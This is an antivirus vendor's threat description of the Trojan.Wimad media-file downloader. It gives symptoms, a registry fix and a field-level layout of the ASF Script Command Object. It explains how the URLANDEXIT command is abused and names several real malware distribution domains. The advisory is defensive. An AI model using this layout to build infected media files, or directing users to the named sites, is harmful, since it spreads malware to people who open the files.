My Bitdefender
  • 0 Shopping Cart

SHARE
THIS ON

Facebook Twitter Google Plus

Trojan.Wimad.Gen.1

MEDIUM
MEDIUM
varies
(WMA/TrojanDownloader.GetCodec.gen trojan, EXP/ASF.GetCodec.Gen, WMA:Wimad, Trojan-Downloader.WMA.GetCodec, Trojan.Wimad)

Symptoms

When running an ASF file a browser window opens to a specific website that downloads a piece of malicious software.

Here is a screenshot of this behavior in Windows Media Player :


Removal instructions:

Set the following registry value to : HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\"URLAndExitCommandsEnabled" = "0"
Please let BitDefender disinfect your files.

Analyzed By

Daniel Chipiristeanu, virus researcher

Technical Description:

First let's look at what an ASF is, according to Microsoft : "Advanced Systems Format (ASF) is an extensible file format designed to store coordinated  digital media data. It supports data delivery over a wide variety of networks and is also suitable for local playback." You can see the full format specifications from the vendor here : http://www.microsoft.com/windows/windowsmedia/forpros/format/asfspec.aspx

Shortly put, ASF a container that stores data in different encodings (Windows Media Audio (.WMA) and Windows Media Video (.WMV)).

 
Before defining the detection, let's know more about the file format of ASF, as we'll describe just the road to our vulnerable script function trough-out the headers.

It's devided into three parts (objects):
1. Header Object which may contain, in no particular order, these other ASF objects:
  1. File Properties Object. Contains global file attributes.
  2. Stream Properties Object. Defines a digital media stream and its characteristics.
  3. Header Extension Object. Allows additional functionality to be added to an ASF file while maintaining backward compatibility.
  4. Content Description Object. Contains bibliographic information.
  5. Script Command Object. Contains commands that can be executed on the playback timeline.

2. Data Object - contains digital media data stored into ASF Data Packets of fixed length and sorted in the order of appearance.
3. Other Index objects (which are optional)

It uses GUIDs (Globally Unique Identifier) to point out the start of an ASF object.

Header Object has this GUID -> 75B22630-668E-11CF-A6D9-00AA0062CE6C and it looks like this:

Field name

Field type

Size (bits)

Object ID

GUID

128

Object Size

QWORD 

64

Number of Header Objects

DWORD 

32

Reserved1

BYTE

8

Reserved2

BYTE

8




The Header Object can have a Script Command Object header (GUID -> 1EFB1A30-0B62-11D0-A39B-00A0C90348F6 ):

Field name

Field type

Size (bits)

Object ID

GUID

128

Object Size

QWORD

64

Reserved

GUID

128

Commands Count

WORD

16

Command Types Count

WORD

16

Command Types

See below

varies

Commands

See below

varies



The Command Type Count announces the number of Command Types. The same is for Commands Count and Commands.

Command Type structure :

Field name

Field type

Size (bits)

Command Type Name Length

WORD

16

Command Type Name

WCHAR

varies


Commands :

Field name

Field type

Size (bits)

Presentation Time

DWORD

32

Type Index

WORD

16

Command Name Length

WORD

16

Command Name

WCHAR

varies


The Command Type Name Length field specifies the number of Unicode characters that are found within the Command Type Name field. The same goes for Command Name Length and  Command Name.

The attacked feature is using a specific function for Command Type Name ( URLANDEXIT ) that has
as a parameter a  malware distribution website in the Command Name field for the function mentioned.
There are numerous examples of such websites : isvbr.net, fastmp3player.com, missing-codecs.net, seonomad.com. For malicious files from these we have detections like : Trojan.Downloader.JLKD, Trojan.Downloader.JKNX, Adware.PlayMP3z etc.

You can disable this kind of behavior by editing the following registry values : HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\"URLAndExitCommandsEnabled" = "0"
As you can see from the described scheme here, it's rather simple to build programs that "infect" ASF files and give your media data an unwanted behavior. 
Such an example is Trojan.Downloader.GetCodec.B